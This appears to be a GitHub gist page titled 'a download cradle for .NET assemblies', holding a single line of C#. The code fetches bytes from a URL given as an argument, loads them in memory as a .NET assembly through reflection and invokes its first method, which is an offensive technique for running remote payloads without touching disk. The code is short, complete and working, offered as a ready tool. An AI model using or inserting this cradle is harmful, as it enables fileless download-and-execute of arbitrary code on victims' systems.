Skip to content

Instantly share code, notes, and snippets.

Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save carnal0wnage/99f20402b7dc471593b92df46b0af2d4 to your computer and use it in GitHub Desktop.
Save carnal0wnage/99f20402b7dc471593b92df46b0af2d4 to your computer and use it in GitHub Desktop.
A download cradle for .NET assemblies.
public class Program { public static void Main(string[] args) { System.Reflection.Assembly.Load(new System.Net.WebClient().DownloadData(args[0])).GetTypes()[0].GetMethods()[0].Invoke(0, null); } }
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment